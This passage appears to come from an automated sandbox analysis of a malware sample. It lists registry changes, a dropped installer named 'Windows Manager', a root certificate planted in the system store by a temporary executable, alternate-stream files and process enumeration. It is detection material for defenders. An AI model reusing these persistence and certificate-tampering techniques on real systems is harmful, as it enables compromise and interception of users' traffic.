4f5757e7e8e0e0f8f8f0f0c8c8c0c0d8d8d0d02828202038383030080800001818101068686060787870704848404058585050a8a9a1a1b9b9b1b18989818199999191e9e9e1e1f9f9f1f1c9c9c1c1d9d9d1d1292921213939090901011919111169696161797971714949414159595151a9aaa2a2babab2b28a8a82829a9a9292eaeae2e2fafaf2f2cacac2c2dadad2d22a2a22223a3a32320a0a02021a1a12126a6a62627a7a72724a4a42425a5a5252aa0000e0e00070710100c86c7c7c4c4c5c5cacadbdbd8d8d9d9dededfdfdcdcddddd2d2d3d3d0d0d1d1d6d6d7d7d4d4d5d5dadaebebe8e8e9e9eeeeefefececedede2e2e3e3e0e0e1e1e6e6e7e7e4e4e5e5eaeafbfbf8f8f9f9fefefffffcfcfdfdf2f2f3f3f0f0f1f1f6f6f7f7f4f4f5f5fafa0b0b080809090e0e0f0f0c0c0d0d020203030000010106060707040405050a0a1b1b181819191e1e1f1f1c1c1d1d121213131010111116161717141415151a1a2b2b282829292e2e2f2f2c2c2d2d222223232020212126262727242425252a2a3b3b383839393e3e3f3f3c3c3d3d323233333030313136363737343435353a3a4b4b484849494e4e4f4f4c4c4d4d424243434040414146464747444445454a4a5b5b585859595e5e5f5f5c5c5d5d525253535050515156565757545455555a5a6b6b686869696e6e6f6f6c6c6d6d626263636060616166666767646465656a6a7b7b787879797e7e7f7f7c7c7d7d727273737070717176767777747475757aff0f0008484000008a8b8b888889898e8e8f8f8c8c8d8d828283838080818186868787848485858a8a9b9b989899999e9e9f9f9c9c9d9d929293939090919196969797949495959a9aababa8a8a9a9aeaeafafacacadada2a2a3a3a0a0a1a1a6a6a7a7a4a4a5a5a828f9f9fefefffffcfcfdfdf2f2f3f3f0f0f1f1f6f6f7f7f4f4f5f5faf000101b4b5010000a0b0b080809090e0e0f0f0c0c0d0d020203030000010106060707040405050a0a1b1b181819191e1e1f1f1c1c1d1d121213131010111116161717141415151a1a2b2b282829292e2e2f2f2c2c2d2d222223232020212126262727242425252a2a3b3b383839393e3e3f3f3c3c3d3d323233333030313136363737343435353a3a4b4b484849494e4e4f4f4c4c4d4d424243434040414146464747444445454a4a5b5b585859595e5e5f5f5c5c5d5d525253535050515156565757545455555a5a6b6b686869696e6e6f6f6c6c6d6d626263636060616166666767646465656a6a7b7b787879797e7e7f7f7c7c7d7d727273737070717176767777747475757a7a8b8b888889898e8e8f8f8c8c8d8d828283838080818186868787848485858a8a9b9b989899999e9e9f9f9c9c9d9d929293939090919196969797949495959a9aababa8a8a9a9aeaeafafacacadada2a2a3a3a0a0a1a1a6a6a7a7a4a4a5a5aaaabbbbb8b8b9b9bebebfbfbcbcbdbdb2b2b3b3b0b0b1b1b6b6b7b7b4b4b5b5babacbcbc8c8c9c9cececfcfcccccdcdc2c2c3c3c0c0c1c1c6c6c7c7c4c4c5c5cacadbdbd8d8d9d9dededfdfdad30310110100000882d05050d0da500005051015050000078da32357d7d5d5dbdbe9e9efefe2e2e06060e0e16164e4e5656b6b8b0b08888808098989090e8e8e0e0f8f8f0f0c0c0d8d8d0d0282820203838303008084040b8b99191c1c1a900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001 C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "Microsoft" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\PackageName = "Windows Manager - Postback Y.msi" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = d32e7c015fa7d701 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mcafee.com C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = b08fe1c761a7d701 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListInPrivateBrowsingAllowed = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{40CD1DF4-AF48-4DED-9F17-9892FE6BC3AA} = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{69RG4ZP0-857P-S13A-ZW93-6DTG316B7ZWC} C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mcafee.com\ = "241" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "404" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "%windir%\\Speech_OneCore\\Engines\\SR\\en-US-N\\c1033.fe" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\mcafee.com C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "273" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\ImageStoreRandomFolder = "pso2vuk" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "SR en-US Lts Lexicon" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "237" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "254" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberComplete = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "395205405" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat196ac06a9e6.exe N/A

NTFS ADS

Description Indicator Process Target
File created C:\ProgramData\EMGKK6Y07HFVSXJ4.exe:Zone.Identifier C:\Users\Admin\AppData\Local\Temp\KPzSScVqZ.exe N/A
File opened for modification C:\ProgramData\EMGKK6Y07HFVSXJ4.exe:Zone.Identifier C:\Users\Admin\AppData\Local\Temp\KPzSScVqZ.exe N/A

Runs net.exe

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19c6762a08beae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19c6762a08beae.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19e6a852f849bb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19e6a852f849bb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19e6a852f849bb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19e6a852f849bb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19e6a852f849bb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19e6a852f849bb2.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19e6a852f849bb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19e6a852f849bb2.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\KPzSScVqZ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\KPzSScVqZ.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A
N/A N/A C:\Windows\system32\WerFault.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19c6762a08beae.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
